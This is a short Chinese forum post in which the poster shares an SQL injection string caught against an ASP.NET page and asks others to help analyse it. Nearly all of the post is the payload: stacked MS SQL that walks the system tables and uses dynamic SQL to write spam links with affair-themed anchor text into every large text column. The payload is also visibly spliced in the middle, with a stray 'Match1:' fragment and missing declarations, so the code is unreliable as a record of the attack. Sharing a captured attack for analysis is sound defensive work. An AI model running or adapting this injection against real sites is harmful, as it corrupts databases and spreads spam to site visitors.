今天拦截到一个SQL注入 有兴趣的帮忙分析一下!

来源:互联网 发布:网络晒娃 编辑:程序博客网 时间:2024/06/01 07:38
/pages/showapro.aspx?id=106');declare @b cursor;declare @s varchar(800 Match1:char(47)+char(47)+''www.crossbordercapital.com''+char(47)+''blog''+char(47)+''template''+char(47)+''page''+char(47)+''types-of-women-who-cheat.aspx.''+char(62)+''''''+case abs(checksum(newid()))%3 when 0 then ''''looking for affair'''' when 1 then ''''crossbordercapital.com'''' else ''''my wife cheated on me now what'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' why do men cheat on their wife''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' from sysindexes as i inner join sysobjects as o on i.id=o.id inner join information_schema.columns on o.name=table_name where(indid in (0,1)) and data_type like ''%varchar'' and(character_maximum_length in (2147483647,-1));open @c;fetch next from @c into @d;while @@fetch_status=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--& 
0 0
原创粉丝点击